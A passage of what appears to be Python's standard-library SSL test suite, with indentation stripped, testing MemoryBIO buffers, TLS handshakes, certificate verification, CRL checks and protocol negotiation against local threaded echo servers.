bio = ssl.MemoryBIO()
self.assertFalse(bio.eof)
self.assertEqual(bio.read(), b'')
self.assertFalse(bio.eof)
bio.write(b'foo')
self.assertFalse(bio.eof)
bio.write_eof()
self.assertFalse(bio.eof)
self.assertEqual(bio.read(2), b'fo')
self.assertFalse(bio.eof)
self.assertEqual(bio.read(1), b'o')
self.assertTrue(bio.eof)
self.assertEqual(bio.read(), b'')
self.assertTrue(bio.eof)
def test_pending(self):
bio = ssl.MemoryBIO()
self.assertEqual(bio.pending, 0)
bio.write(b'foo')
self.assertEqual(bio.pending, 3)
for i in range(3):
bio.read(1)
self.assertEqual(bio.pending, 3-i-1)
for i in range(3):
bio.write(b'x')
self.assertEqual(bio.pending, i+1)
bio.read()
self.assertEqual(bio.pending, 0)
def test_buffer_types(self):
bio = ssl.MemoryBIO()
bio.write(b'foo')
self.assertEqual(bio.read(), b'foo')
bio.write(bytearray(b'bar'))
self.assertEqual(bio.read(), b'bar')
bio.write(memoryview(b'baz'))
self.assertEqual(bio.read(), b'baz')
def test_error_types(self):
bio = ssl.MemoryBIO()
self.assertRaises(TypeError, bio.write, 'foo')
self.assertRaises(TypeError, bio.write, None)
self.assertRaises(TypeError, bio.write, True)
self.assertRaises(TypeError, bio.write, 1)
class SSLObjectTests(unittest.TestCase):
def test_private_init(self):
bio = ssl.MemoryBIO()
with self.assertRaisesRegex(TypeError, "public constructor"):
ssl.SSLObject(bio, bio)
class SimpleBackgroundTests(unittest.TestCase):
"""Tests that connect to a simple server running in the background"""
def setUp(self):
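# Start a TLS echo server in a background thread and make sure it is
# shut down when the test finishes.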
server = ThreadedEchoServer(SIGNED_CERTFILE)
self.server_addr = (HOST, server.port)
server.__enter__()
self.addCleanup(server.__exit__, None, None, None)
def test_connect(self):
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE) as s:
s.connect(self.server_addr)
self.assertEqual({}, s.getpeercert())
self.assertFalse(s.server_side)
# this should succeed because we specify the root cert
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SIGNING_CA) as s:
s.connect(self.server_addr)
self.assertTrue(s.getpeercert())
self.assertFalse(s.server_side)
def test_connect_fail(self):
# This should fail because we have no verification certs. Connection
# failure crashes ThreadedEchoServer, so run this in an independent
# test method.
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED)
self.addCleanup(s.close)
self.assertRaisesRegex(ssl.SSLError, "certificate verify failed",
s.connect, self.server_addr)
def test_connect_ex(self):
# Issue #11326: check connect_ex() implementation
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SIGNING_CA)
self.addCleanup(s.close)
self.assertEqual(0, s.connect_ex(self.server_addr))
self.assertTrue(s.getpeercert())
def test_non_blocking_connect_ex(self):
# Issue #11326: non-blocking connect_ex() should allow handshake
# to proceed after the socket gets ready.
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SIGNING_CA,
do_handshake_on_connect=False)
self.addCleanup(s.close)
s.setblocking(False)
rc = s.connect_ex(self.server_addr)
# EWOULDBLOCK under Windows, EINPROGRESS elsewhere
self.assertIn(rc, (0, errno.EINPROGRESS, errno.EWOULDBLOCK))
# Wait for connect to finish
select.select([], [s], [], 5.0)
# Non-blocking handshake
while True:
try:
s.do_handshake()
break
except ssl.SSLWantReadError:
select.select([s], [], [], 5.0)
except ssl.SSLWantWriteError:
select.select([], [s], [], 5.0)
# SSL established
self.assertTrue(s.getpeercert())
def test_connect_with_context(self):
# Same as test_connect, but with a separately created context
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
self.assertEqual({}, s.getpeercert())
# Same with a server hostname
with ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname="dummy") as s:
s.connect(self.server_addr)
ctx.verify_mode = ssl.CERT_REQUIRED
# This should succeed because we specify the root cert
ctx.load_verify_locations(SIGNING_CA)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
def test_connect_with_context_fail(self):
# This should fail because we have no verification certs. Connection
# failure crashes ThreadedEchoServer, so run this in an independent
# test method.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
ctx.verify_mode = ssl.CERT_REQUIRED
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
self.addCleanup(s.close)
self.assertRaisesRegex(ssl.SSLError, "certificate verify failed",
s.connect, self.server_addr)
def test_connect_capath(self):
# Verify server certificates using the `capath` argument
# NOTE: the subject hashing algorithm has been changed between
# OpenSSL 0.9.8n and 1.0.0, as a result the capath directory must
# contain both versions of each certificate (same content, different
# filename) for this test to be portable across OpenSSL releases.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(capath=CAPATH)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
# Same with a bytes `capath` argument
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(capath=BYTES_CAPATH)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
def test_connect_cadata(self):
with open(SIGNING_CA) as f:
pem = f.read()
der = ssl.PEM_cert_to_DER_cert(pem)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(cadata=pem)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
# same with DER
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(cadata=der)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
@unittest.skipIf(os.name == "nt", "Can't use a socket as a file under Windows")
def test_makefile_close(self):
# Issue #5238: creating a file-like object with makefile() shouldn't
# delay closing the underlying "real socket" (here tested with its
# file descriptor, hence skipping the test under Windows).
ss = test_wrap_socket(socket.socket(socket.AF_INET))
ss.connect(self.server_addr)
fd = ss.fileno()
f = ss.makefile()
f.close()
# The fd is still open
os.read(fd, 0)
# Closing the SSL socket should close the fd too
ss.close()
gc.collect()
with self.assertRaises(OSError) as e:
os.read(fd, 0)
self.assertEqual(e.exception.errno, errno.EBADF)
def test_non_blocking_handshake(self):
s = socket.socket(socket.AF_INET)
s.connect(self.server_addr)
s.setblocking(False)
s = test_wrap_socket(s,
cert_reqs=ssl.CERT_NONE,
do_handshake_on_connect=False)
self.addCleanup(s.close)
count = 0
while True:
try:
count += 1
s.do_handshake()
break
except ssl.SSLWantReadError:
select.select([s], [], [])
except ssl.SSLWantWriteError:
select.select([], [s], [])
if support.verbose:
sys.stdout.write("\nNeeded %d calls to do_handshake() to establish session.\n" % count)
def test_get_server_certificate(self):
_test_get_server_certificate(self, *self.server_addr, cert=SIGNING_CA)
def test_get_server_certificate_fail(self):
# Connection failure crashes ThreadedEchoServer, so run this in an
# independent test method
_test_get_server_certificate_fail(self, *self.server_addr)
def test_ciphers(self):
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE, ciphers="ALL") as s:
s.connect(self.server_addr)
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE, ciphers="DEFAULT") as s:
s.connect(self.server_addr)
# Error checking can happen at instantiation or when connecting
with self.assertRaisesRegex(ssl.SSLError, "No cipher can be selected"):
with socket.socket(socket.AF_INET) as sock:
s = test_wrap_socket(sock,
cert_reqs=ssl.CERT_NONE, ciphers="^$:,;?*'dorothyx")
s.connect(self.server_addr)
def test_get_ca_certs_capath(self):
# capath certs are loaded on request
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_verify_locations(capath=CAPATH)
self.assertEqual(ctx.get_ca_certs(), [])
with ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname='localhost') as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
self.assertEqual(len(ctx.get_ca_certs()), 1)
@needs_sni
def test_context_setget(self):
# Check that the context of a connected socket can be replaced.
ctx1 = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx1.load_verify_locations(capath=CAPATH)
ctx2 = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx2.load_verify_locations(capath=CAPATH)
s = socket.socket(socket.AF_INET)
with ctx1.wrap_socket(s, server_hostname='localhost') as ss:
ss.connect(self.server_addr)
self.assertIs(ss.context, ctx1)
self.assertIs(ss._sslobj.context, ctx1)
ss.context = ctx2
self.assertIs(ss.context, ctx2)
self.assertIs(ss._sslobj.context, ctx2)
def ssl_io_loop(self, sock, incoming, outgoing, func, *args, **kwargs):
# A simple I/O loop: call func(*args) and, depending on the error we get
# (WANT_READ or WANT_WRITE), move data between the socket and the BIOs.
timeout = kwargs.get('timeout', 10)
deadline = time.monotonic() + timeout
count = 0
while True:
if time.monotonic() > deadline:
self.fail("timeout")
errno = None
count += 1
try:
ret = func(*args)
except ssl.SSLError as e:
if e.errno not in (ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE):
raise
errno = e.errno
# Get any data from the outgoing BIO irrespective of any error, and
# send it to the socket.
buf = outgoing.read()
sock.sendall(buf)
# If there's no error, we're done. For WANT_READ, we need to get
# data from the socket and put it in the incoming BIO.
if errno is None:
break
elif errno == ssl.SSL_ERROR_WANT_READ:
buf = sock.recv(32768)
if buf:
incoming.write(buf)
else:
incoming.write_eof()
if support.verbose:
sys.stdout.write("Needed %d calls to complete %s().\n"
% (count, func.__name__))
return ret
def test_bio_handshake(self):
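# Drive a complete handshake through a pair of MemoryBIOs, shuttling the
# raw bytes over the plain TCP socket with ssl_io_loop().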
sock = socket.socket(socket.AF_INET)
self.addCleanup(sock.close)
sock.connect(self.server_addr)
incoming = ssl.MemoryBIO()
outgoing = ssl.MemoryBIO()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.load_verify_locations(SIGNING_CA)
sslobj = ctx.wrap_bio(incoming, outgoing, False,
SIGNED_CERTFILE_HOSTNAME)
self.assertIs(sslobj._sslobj.owner, sslobj)
self.assertIsNone(sslobj.cipher())
self.assertIsNone(sslobj.version())
self.assertIsNotNone(sslobj.shared_ciphers())
self.assertRaises(ValueError, sslobj.getpeercert)
if 'tls-unique' in ssl.CHANNEL_BINDING_TYPES:
self.assertIsNone(sslobj.get_channel_binding('tls-unique'))
self.ssl_io_loop(sock, incoming, outgoing, sslobj.do_handshake)
self.assertTrue(sslobj.cipher())
self.assertIsNotNone(sslobj.shared_ciphers())
self.assertIsNotNone(sslobj.version())
self.assertTrue(sslobj.getpeercert())
if 'tls-unique' in ssl.CHANNEL_BINDING_TYPES:
self.assertTrue(sslobj.get_channel_binding('tls-unique'))
try:
self.ssl_io_loop(sock, incoming, outgoing, sslobj.unwrap)
except ssl.SSLSyscallError:
# If the server shuts down the TCP connection without sending a
# secure shutdown message, this is reported as SSL_ERROR_SYSCALL
pass
self.assertRaises(ssl.SSLError, sslobj.write, b'foo')
def test_bio_read_write_data(self):
sock = socket.socket(socket.AF_INET)
self.addCleanup(sock.close)
sock.connect(self.server_addr)
incoming = ssl.MemoryBIO()
outgoing = ssl.MemoryBIO()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
ctx.verify_mode = ssl.CERT_NONE
sslobj = ctx.wrap_bio(incoming, outgoing, False)
self.ssl_io_loop(sock, incoming, outgoing, sslobj.do_handshake)
req = b'FOO\n'
self.ssl_io_loop(sock, incoming, outgoing, sslobj.write, req)
buf = self.ssl_io_loop(sock, incoming, outgoing, sslobj.read, 1024)
self.assertEqual(buf, b'foo\n')
self.ssl_io_loop(sock, incoming, outgoing, sslobj.unwrap)
class NetworkedTests(unittest.TestCase):
def test_timeout_connect_ex(self):
# Issue #12065: on a timeout, connect_ex() should return the original
# errno (mimicking the behaviour of non-SSL sockets).
with support.transient_internet(REMOTE_HOST):
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
do_handshake_on_connect=False)
self.addCleanup(s.close)
s.settimeout(0.0000001)
rc = s.connect_ex((REMOTE_HOST, 443))
if rc == 0:
self.skipTest("REMOTE_HOST responded too quickly")
self.assertIn(rc, (errno.EAGAIN, errno.EWOULDBLOCK))
@unittest.skipUnless(support.IPV6_ENABLED, 'Needs IPv6')
def test_get_server_certificate_ipv6(self):
with support.transient_internet('ipv6.google.com'):
_test_get_server_certificate(self, 'ipv6.google.com', 443)
_test_get_server_certificate_fail(self, 'ipv6.google.com', 443)
def _test_get_server_certificate(test, host, port, cert=None):
pem = ssl.get_server_certificate((host, port))
if not pem:
test.fail("No server certificate on %s:%s!" % (host, port))
pem = ssl.get_server_certificate((host, port), ca_certs=cert)
if not pem:
test.fail("No server certificate on %s:%s!" % (host, port))
if support.verbose:
sys.stdout.write("\nVerified certificate for %s:%s is\n%s\n" % (host, port ,pem))
def _test_get_server_certificate_fail(test, host, port):
try:
pem = ssl.get_server_certificate((host, port), ca_certs=CERTFILE)
except ssl.SSLError as x:
        # should fail
if support.verbose:
sys.stdout.write("%s\n" % x)
else:
test.fail("Got server certificate %s for %s:%s!" % (pem, host, port))
from test.ssl_servers import make_https_server
class ThreadedEchoServer(threading.Thread):
class ConnectionHandler(threading.Thread):
"""A mildly complicated class, because we want it to work both
with and without the SSL wrapper around the socket connection, so
that we can test the STARTTLS functionality."""
def __init__(self, server, connsock, addr):
self.server = server
self.running = False
self.sock = connsock
self.addr = addr
self.sock.setblocking(1)
self.sslconn = None
threading.Thread.__init__(self)
self.daemon = True
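        # wrap_conn() upgrades the accepted plain socket to TLS and records
        # the negotiated NPN/ALPN protocols; on failure it stores the error
        # as a string in server.conn_errors and closes the connection.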
def wrap_conn(self):
try:
self.sslconn = self.server.context.wrap_socket(
self.sock, server_side=True)
self.server.selected_npn_protocols.append(self.sslconn.selected_npn_protocol())
self.server.selected_alpn_protocols.append(self.sslconn.selected_alpn_protocol())
except (ConnectionResetError, BrokenPipeError) as e:
# We treat ConnectionResetError as though it were an
# SSLError - OpenSSL on Ubuntu abruptly closes the
# connection when asked to use an unsupported protocol.
#
# BrokenPipeError is raised in TLS 1.3 mode, when OpenSSL
# tries to send session tickets after handshake.
# https://github.com/openssl/openssl/issues/6342
self.server.conn_errors.append(str(e))
if self.server.chatty:
handle_error("\n server: bad connection attempt from " + repr(self.addr) + ":\n")
self.running = False
self.close()
return False
except (ssl.SSLError, OSError) as e:
# OSError may occur with wrong protocols, e.g. both
# sides use PROTOCOL_TLS_SERVER.
#
# XXX Various errors can have happened here, for example
# a mismatching protocol version, an invalid certificate,
# or a low-level bug. This should be made more discriminating.
#
# bpo-31323: Store the exception as string to prevent
# a reference leak: server -> conn_errors -> exception
# -> traceback -> self (ConnectionHandler) -> server
self.server.conn_errors.append(str(e))
if self.server.chatty:
handle_error("\n server: bad connection attempt from " + repr(self.addr) + ":\n")
self.running = False
self.server.stop()
self.close()
return False
else:
self.server.shared_ciphers.append(self.sslconn.shared_ciphers())
if self.server.context.verify_mode == ssl.CERT_REQUIRED:
cert = self.sslconn.getpeercert()
if support.verbose and self.server.chatty:
sys.stdout.write(" client cert is " + pprint.pformat(cert) + "\n")
cert_binary = self.sslconn.getpeercert(True)
if support.verbose and self.server.chatty:
sys.stdout.write(" cert binary is " + str(len(cert_binary)) + " bytes\n")
cipher = self.sslconn.cipher()
if support.verbose and self.server.chatty:
sys.stdout.write(" server: connection cipher is now " + str(cipher) + "\n")
sys.stdout.write(" server: selected protocol is now "
+ str(self.sslconn.selected_npn_protocol()) + "\n")
return True
def read(self):
if self.sslconn:
return self.sslconn.read()
else:
return self.sock.recv(1024)
def write(self, bytes):
if self.sslconn:
return self.sslconn.write(bytes)
else:
return self.sock.send(bytes)
def close(self):
if self.sslconn:
self.sslconn.close()
else:
self.sock.close()
def run(self):
self.running = True
if not self.server.starttls_server:
if not self.wrap_conn():
return
while self.running:
try:
msg = self.read()
stripped = msg.strip()
if not stripped:
# eof, so quit this handler
self.running = False
try:
self.sock = self.sslconn.unwrap()
except OSError:
# Many tests shut the TCP connection down
# without an SSL shutdown. This causes
# unwrap() to raise OSError with errno=0!
pass
else:
self.sslconn = None
self.close()
elif stripped == b'over':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: client closed connection\n")
self.close()
return
elif (self.server.starttls_server and
stripped == b'STARTTLS'):
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read STARTTLS from client, sending OK...\n")
self.write(b"OK\n")
if not self.wrap_conn():
return
elif (self.server.starttls_server and self.sslconn
and stripped == b'ENDTLS'):
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read ENDTLS from client, sending OK...\n")
self.write(b"OK\n")
self.sock = self.sslconn.unwrap()
self.sslconn = None
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: connection is now unencrypted...\n")
elif stripped == b'CB tls-unique':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read CB tls-unique from client, sending our CB data...\n")
data = self.sslconn.get_channel_binding("tls-unique")
self.write(repr(data).encode("us-ascii") + b"\n")
else:
if (support.verbose and
self.server.connectionchatty):
ctype = (self.sslconn and "encrypted") or "unencrypted"
sys.stdout.write(" server: read %r (%s), sending back %r (%s)...\n"
% (msg, ctype, msg.lower(), ctype))
self.write(msg.lower())
except ConnectionResetError:
# XXX: OpenSSL 1.1.1 sometimes raises ConnectionResetError
# when connection is not shut down gracefully.
if self.server.chatty and support.verbose:
sys.stdout.write(
" Connection reset by peer: {}\n".format(
self.addr)
)
self.close()
self.running = False
except OSError:
if self.server.chatty:
handle_error("Test server failure:\n")
self.close()
self.running = False
# normally, we'd just stop here, but for the test
# harness, we want to stop the server
self.server.stop()
def __init__(self, certificate=None, ssl_version=None,
certreqs=None, cacerts=None,
chatty=True, connectionchatty=False, starttls_server=False,
npn_protocols=None, alpn_protocols=None,
ciphers=None, context=None):
if context:
self.context = context
else:
self.context = ssl.SSLContext(ssl_version
if ssl_version is not None
else ssl.PROTOCOL_TLS_SERVER)
self.context.verify_mode = (certreqs if certreqs is not None
else ssl.CERT_NONE)
if cacerts:
self.context.load_verify_locations(cacerts)
if certificate:
self.context.load_cert_chain(certificate)
if npn_protocols:
self.context.set_npn_protocols(npn_protocols)
if alpn_protocols:
self.context.set_alpn_protocols(alpn_protocols)
if ciphers:
self.context.set_ciphers(ciphers)
self.chatty = chatty
self.connectionchatty = connectionchatty
self.starttls_server = starttls_server
self.sock = socket.socket()
self.port = support.bind_port(self.sock)
self.flag = None
self.active = False
self.selected_npn_protocols = []
self.selected_alpn_protocols = []
self.shared_ciphers = []
self.conn_errors = []
threading.Thread.__init__(self)
self.daemon = True
def __enter__(self):
self.start(threading.Event())
self.flag.wait()
return self
def __exit__(self, *args):
self.stop()
self.join()
def start(self, flag=None):
self.flag = flag
threading.Thread.start(self)
def run(self):
self.sock.settimeout(0.05)
self.sock.listen()
self.active = True
if self.flag:
# signal an event
self.flag.set()
while self.active:
try:
newconn, connaddr = self.sock.accept()
if support.verbose and self.chatty:
sys.stdout.write(' server: new connection from '
+ repr(connaddr) + '\n')
handler = self.ConnectionHandler(self, newconn, connaddr)
handler.start()
handler.join()
except socket.timeout:
pass
except KeyboardInterrupt:
self.stop()
except BaseException as e:
if support.verbose and self.chatty:
sys.stdout.write(
' connection handling failed: ' + repr(e) + '\n')
self.sock.close()
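    # stop() only clears the flag; run() notices it on the next 0.05 s accept
    # timeout and then closes the listening socket.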
def stop(self):
self.active = False
class AsyncoreEchoServer(threading.Thread):
# this one's based on asyncore.dispatcher
class EchoServer (asyncore.dispatcher):
class ConnectionHandler(asyncore.dispatcher_with_send):
def __init__(self, conn, certfile):
self.socket = test_wrap_socket(conn, server_side=True,
certfile=certfile,
do_handshake_on_connect=False)
asyncore.dispatcher_with_send.__init__(self, self.socket)
self._ssl_accepting = True
self._do_ssl_handshake()
def readable(self):
if isinstance(self.socket, ssl.SSLSocket):
while self.socket.pending() > 0:
self.handle_read_event()
return True
def _do_ssl_handshake(self):
try:
self.socket.do_handshake()
except (ssl.SSLWantReadError, ssl.SSLWantWriteError):
return
except ssl.SSLEOFError:
return self.handle_close()
except ssl.SSLError:
raise
except OSError as err:
if err.args[0] == errno.ECONNABORTED:
return self.handle_close()
else:
self._ssl_accepting = False
def handle_read(self):
if self._ssl_accepting:
self._do_ssl_handshake()
else:
data = self.recv(1024)
if support.verbose:
sys.stdout.write(" server: read %s from client\n" % repr(data))
if not data:
self.close()
else:
self.send(data.lower())
def handle_close(self):
self.close()
if support.verbose:
sys.stdout.write(" server: closed connection %s\n" % self.socket)
def handle_error(self):
raise
def __init__(self, certfile):
self.certfile = certfile
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.port = support.bind_port(sock, '')
asyncore.dispatcher.__init__(self, sock)
self.listen(5)
def handle_accepted(self, sock_obj, addr):
if support.verbose:
sys.stdout.write(" server: new connection from %s:%s\n" %addr)
self.ConnectionHandler(sock_obj, self.certfile)
def handle_error(self):
raise
def __init__(self, certfile):
self.flag = None
self.active = False
self.server = self.EchoServer(certfile)
self.port = self.server.port
threading.Thread.__init__(self)
self.daemon = True
def __str__(self):
return "<%s %s>" % (self.__class__.__name__, self.server)
def __enter__(self):
self.start(threading.Event())
self.flag.wait()
return self
def __exit__(self, *args):
if support.verbose:
sys.stdout.write(" cleanup: stopping server.\n")
self.stop()
if support.verbose:
sys.stdout.write(" cleanup: joining server thread.\n")
self.join()
if support.verbose:
sys.stdout.write(" cleanup: successfully joined.\n")
# make sure that ConnectionHandler is removed from socket_map
asyncore.close_all(ignore_all=True)
def start (self, flag=None):
self.flag = flag
threading.Thread.start(self)
def run(self):
self.active = True
if self.flag:
self.flag.set()
while self.active:
try:
asyncore.loop(1)
except:
pass
def stop(self):
self.active = False
self.server.close()
def server_params_test(client_context, server_context, indata=b"FOO\n",
chatty=True, connectionchatty=False, sni_name=None,
session=None):
"""
Launch a server, connect a client to it and try various reads
and writes.
"""
stats = {}
server = ThreadedEchoServer(context=server_context,
chatty=chatty,
connectionchatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=sni_name, session=session) as s:
s.connect((HOST, server.port))
for arg in [indata, bytearray(indata), memoryview(indata)]:
if connectionchatty:
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
s.write(arg)
outdata = s.read()
if connectionchatty:
if support.verbose:
sys.stdout.write(" client: read %r\n" % outdata)
if outdata != indata.lower():
raise AssertionError(
"bad data <<%r>> (%d) received; expected <<%r>> (%d)\n"
% (outdata[:20], len(outdata),
indata[:20].lower(), len(indata)))
s.write(b"over\n")
if connectionchatty:
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
stats.update({
'compression': s.compression(),
'cipher': s.cipher(),
'peercert': s.getpeercert(),
'client_alpn_protocol': s.selected_alpn_protocol(),
'client_npn_protocol': s.selected_npn_protocol(),
'version': s.version(),
'session_reused': s.session_reused,
'session': s.session,
})
s.close()
stats['server_alpn_protocols'] = server.selected_alpn_protocols
stats['server_npn_protocols'] = server.selected_npn_protocols
stats['server_shared_ciphers'] = server.shared_ciphers
return stats
def try_protocol_combo(server_protocol, client_protocol, expect_success,
certsreqs=None, server_options=0, client_options=0):
"""
Try to SSL-connect using *client_protocol* to *server_protocol*.
If *expect_success* is true, assert that the connection succeeds,
if it's false, assert that the connection fails.
Also, if *expect_success* is a string, assert that it is the protocol
version actually used by the connection.
"""
if certsreqs is None:
certsreqs = ssl.CERT_NONE
certtype = {
ssl.CERT_NONE: "CERT_NONE",
ssl.CERT_OPTIONAL: "CERT_OPTIONAL",
ssl.CERT_REQUIRED: "CERT_REQUIRED",
}[certsreqs]
if support.verbose:
formatstr = (expect_success and " %s->%s %s\n") or " {%s->%s} %s\n"
sys.stdout.write(formatstr %
(ssl.get_protocol_name(client_protocol),
ssl.get_protocol_name(server_protocol),
certtype))
client_context = ssl.SSLContext(client_protocol)
client_context.options |= client_options
server_context = ssl.SSLContext(server_protocol)
server_context.options |= server_options
# NOTE: we must enable "ALL" ciphers on the client, otherwise an
# SSLv23 client will send an SSLv3 hello (rather than SSLv2)
# starting from OpenSSL 1.0.0 (see issue #8322).
if client_context.protocol == ssl.PROTOCOL_TLS:
client_context.set_ciphers("ALL")
for ctx in (client_context, server_context):
ctx.verify_mode = certsreqs
ctx.load_cert_chain(SIGNED_CERTFILE)
ctx.load_verify_locations(SIGNING_CA)
try:
stats = server_params_test(client_context, server_context,
chatty=False, connectionchatty=False)
# Protocol mismatch can result in either an SSLError, or a
# "Connection reset by peer" error.
except ssl.SSLError:
if expect_success:
raise
except OSError as e:
if expect_success or e.errno != errno.ECONNRESET:
raise
else:
if not expect_success:
raise AssertionError(
"Client protocol %s succeeded with server protocol %s!"
% (ssl.get_protocol_name(client_protocol),
ssl.get_protocol_name(server_protocol)))
elif (expect_success is not True
and expect_success != stats['version']):
raise AssertionError("version mismatch: expected %r, got %r"
% (expect_success, stats['version']))
class ThreadedTests(unittest.TestCase):
def test_echo(self):
"""Basic test of an SSL client connecting to a server"""
if support.verbose:
sys.stdout.write("\n")
for protocol in PROTOCOLS:
if protocol in {ssl.PROTOCOL_TLS_CLIENT, ssl.PROTOCOL_TLS_SERVER}:
continue
with self.subTest(protocol=ssl._PROTOCOL_NAMES[protocol]):
context = ssl.SSLContext(protocol)
context.load_cert_chain(CERTFILE)
server_params_test(context, context,
chatty=True, connectionchatty=True)
client_context, server_context, hostname = testing_context()
with self.subTest(client=ssl.PROTOCOL_TLS_CLIENT, server=ssl.PROTOCOL_TLS_SERVER):
server_params_test(client_context=client_context,
server_context=server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
client_context.check_hostname = False
with self.subTest(client=ssl.PROTOCOL_TLS_SERVER, server=ssl.PROTOCOL_TLS_CLIENT):
with self.assertRaises(ssl.SSLError) as e:
server_params_test(client_context=server_context,
server_context=client_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIn('called a function you should not call',
str(e.exception))
with self.subTest(client=ssl.PROTOCOL_TLS_SERVER, server=ssl.PROTOCOL_TLS_SERVER):
with self.assertRaises(ssl.SSLError) as e:
server_params_test(client_context=server_context,
server_context=server_context,
chatty=True, connectionchatty=True)
self.assertIn('called a function you should not call',
str(e.exception))
with self.subTest(client=ssl.PROTOCOL_TLS_CLIENT, server=ssl.PROTOCOL_TLS_CLIENT):
with self.assertRaises(ssl.SSLError) as e:
server_params_test(client_context=server_context,
server_context=client_context,
chatty=True, connectionchatty=True)
self.assertIn('called a function you should not call',
str(e.exception))
def test_getpeercert(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
do_handshake_on_connect=False,
server_hostname=hostname) as s:
s.connect((HOST, server.port))
                # getpeercert() raises ValueError while the handshake isn't
                # done.
with self.assertRaises(ValueError):
s.getpeercert()
s.do_handshake()
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
cipher = s.cipher()
if support.verbose:
sys.stdout.write(pprint.pformat(cert) + '\n')
sys.stdout.write("Connection cipher is " + str(cipher) + '.\n')
if 'subject' not in cert:
self.fail("No subject field in certificate: %s." %
pprint.pformat(cert))
if ((('organizationName', 'Python Software Foundation'),)
not in cert['subject']):
self.fail(
"Missing or invalid 'organizationName' field in certificate subject; "
"should be 'Python Software Foundation'.")
self.assertIn('notBefore', cert)
self.assertIn('notAfter', cert)
before = ssl.cert_time_to_seconds(cert['notBefore'])
after = ssl.cert_time_to_seconds(cert['notAfter'])
self.assertLess(before, after)
@unittest.skipUnless(have_verify_flags(),
"verify_flags need OpenSSL > 0.9.8")
def test_crl_check(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
tf = getattr(ssl, "VERIFY_X509_TRUSTED_FIRST", 0)
self.assertEqual(client_context.verify_flags, ssl.VERIFY_DEFAULT | tf)
# VERIFY_DEFAULT should pass
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
# VERIFY_CRL_CHECK_LEAF without a loaded CRL file fails
client_context.verify_flags |= ssl.VERIFY_CRL_CHECK_LEAF
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
with self.assertRaisesRegex(ssl.SSLError,
"certificate verify failed"):
s.connect((HOST, server.port))
# now load a CRL file. The CRL file is signed by the CA.
client_context.load_verify_locations(CRLFILE)
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
def test_check_hostname(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
# correct hostname should verify
